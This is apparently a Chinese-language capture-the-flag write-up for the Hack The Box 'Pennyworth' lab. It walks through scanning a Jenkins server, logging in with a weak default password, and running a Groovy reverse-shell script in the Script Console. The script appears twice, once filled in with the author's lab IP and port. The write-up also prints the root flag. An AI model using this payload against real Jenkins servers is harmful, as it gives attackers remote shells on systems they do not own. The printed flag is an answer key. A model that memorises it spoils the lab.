HTB:Pennyworth[WriteUP]

目录

连接至HTB服务器并启动靶机

[1.What does the acronym CVE stand for?](#1.What does the acronym CVE stand for?)

[2.What do the three letters in CIA, referring to the CIA triad in cybersecurity, stand for?](#2.What do the three letters in CIA, referring to the CIA triad in cybersecurity, stand for?)

[3.What is the version of the service running on port 8080?](#3.What is the version of the service running on port 8080?)

[4.What version of Jenkins is running on the target?](#4.What version of Jenkins is running on the target?)

[5.What type of script is accepted as input on the Jenkins Script Console?](#5.What type of script is accepted as input on the Jenkins Script Console?)

[6.What would the "String cmd" variable from the Groovy Script snippet be equal to if the Target VM was running Windows?](#6.What would the "String cmd" variable from the Groovy Script snippet be equal to if the Target VM was running Windows?)

[7.What is a different command than "ip a" we could use to display our network interfaces' information on Linux?](#7.What is a different command than "ip a" we could use to display our network interfaces' information on Linux?)

[8.What switch should we use with netcat for it to use UDP transport mode?](#8.What switch should we use with netcat for it to use UDP transport mode?)

[9.What is the term used to describe making a target host initiate a connection back to the attacker host?](#9.What is the term used to describe making a target host initiate a connection back to the attacker host?)

ROOT_FLAG:9cdfb439c7876e703e307864c9167a15


连接至HTB服务器并启动靶机

靶机IP:10.129.235.133

分配IP:10.10.16.12


1.What does the acronym CVE stand for?

CVE 是 Common Vulnerabilities and Exposures(通用漏洞披露)的缩写。

CVE是一个公开的漏洞命名标准。它为已知的安全漏洞和暴露提供统一的标识符,方便安全研究人员、厂商和用户交流和跟踪安全问题,提升网络安全防护水平。


2.What do the three letters in CIA, referring to the CIA triad in cybersecurity, stand for?

在网络安全中,CIA 三位一体指的是:Confidentiality, Integrity, Availability

保密性(Confidentiality )、完整性(Integrity )和可用性(Availability

保密性确保信息仅被授权的用户访问;完整性保证信息在存储和传输过程中不被篡改;可用性确保授权用户能够随时可靠地访问信息和资源。


3.What is the version of the service running on port 8080?

使用nmap对靶机8080端口进行脚本、服务信息扫描:

nmap -sC -sV -p 8080 {TARGET_IP}

由nmap扫描结果可见,在VERSION 栏目下服务信息为:Jetty 9.4.39.v20210325


4.What version of Jenkins is running on the target?

使用浏览器对靶机URL进行访问:http://{TARGET_IP}:8080

自动跳转到了登录界面,直接弱口令爆破后获得账号密码:

账户:root

密码:password

进入后台面板后,在页面右下角可获得Jenkins版本信息:2.289.1


5.What type of script is accepted as input on the Jenkins Script Console?

点击左侧导航栏的:Manage Jenkins

在右侧往下拉,找到:Script Console

打开之后,查看有关脚本控制页面的描述:

Type in an arbitrary Groovy script and execute it on the server. Useful for trouble-shooting and diagnostics. Use the 'println' command to see the output (if you use System.out, it will go to the server's stdout, which is harder to see.) Example:

println(Jenkins.instance.pluginManager.plugins)

All the classes from all the plugins are visible. jenkins.*, jenkins.model.*, hudson.*, and hudson.model.* are pre-imported.

简单的机翻之后:

输入任意 Groovy 脚本并在服务器上执行它。这对于故障排除和诊断很有用。使用 "println" 命令查看输出(如果你使用 System.out,它将输出到服务器的标准输出,这更难看到)。示例:println(Jenkins.instance.pluginManager.plugins)

所有插件中的所有类都是可见的。jenkins.、jenkins.model.、hudson.* 和 hudson.model.* 已预先导入。

从描述中可以看到Jenkins脚本控制台接受Groovy脚本作为输入


6.What would the "String cmd" variable from the Groovy Script snippet be equal to if the Target VM was running Windows?

在棱角社区可以找到各种类型的脚本Reverse_Shell:(附上链接)

[~]#棱角 ::Edge.Forum*

String host="{NATIVE_IP}";

int port={NATIVE_PORT};

String cmd="/bin/bash";

Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);

InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();

OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());

while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);

try{p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

如果靶机是Windows机器的话,String cmd 字段需要修改为:"cmd.exe"


7.What is a different command than "ip a" we could use to display our network interfaces' information on Linux?

这题就是常识题目:ifconfig ,在命令后加上**-a**参数是展示所有网络接口

ifconfig -a

可以看到我的tun0接口IP是:10.10.16.12


8.What switch should we use with netcat for it to use UDP transport mode?

查看netcat的使用选项:

nc -h

可以看到:-u 参数用于netcat使用UDP传输模式


9.What is the term used to describe making a target host initiate a connection back to the attacker host?

payload中的端口自己设定,所以我自己的完整payload:

String host="10.10.16.12";

int port=1425;

String cmd="/bin/bash";

Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);

InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();

OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());

while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);

try{p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

使用nc开启端口监听,在Script Console端运行脚本获得反弹shell(reverse shell):


利用script启动一个交互shell:

script /dev/null -c bash

最后在/root目录中找到了flag.txt,或者直接执行命令查看:

cat /root/flag.txt

ROOT_FLAG:9cdfb439c7876e703e307864c9167a15

相关推荐
蜜獾云12 小时前
linux firewalld 命令详解
linux·运维·服务器·网络·windows·网络安全·firewalld
H轨迹H19 小时前
#渗透测试 kioptix level 2靶机通关教程及提权
网络安全·渗透测试·oscp
AirDroid_qs21 小时前
Niushop开源商城(漏洞复现)
android·网络安全·开源
星竹1 天前
upload-labs-master第21关超详细教程
网络安全
蜜獾云1 天前
docker 安装雷池WAF防火墙 守护Web服务器
linux·运维·服务器·网络·网络安全·docker·容器
Clockwiseee1 天前
php伪协议
windows·安全·web安全·网络安全
Lspecialnx_2 天前
文件解析漏洞中间件(iis和Apache)
网络安全·中间件
学习溢出2 天前
【网络安全】逆向工程 练习示例
网络·安全·网络安全·渗透测试·逆向工程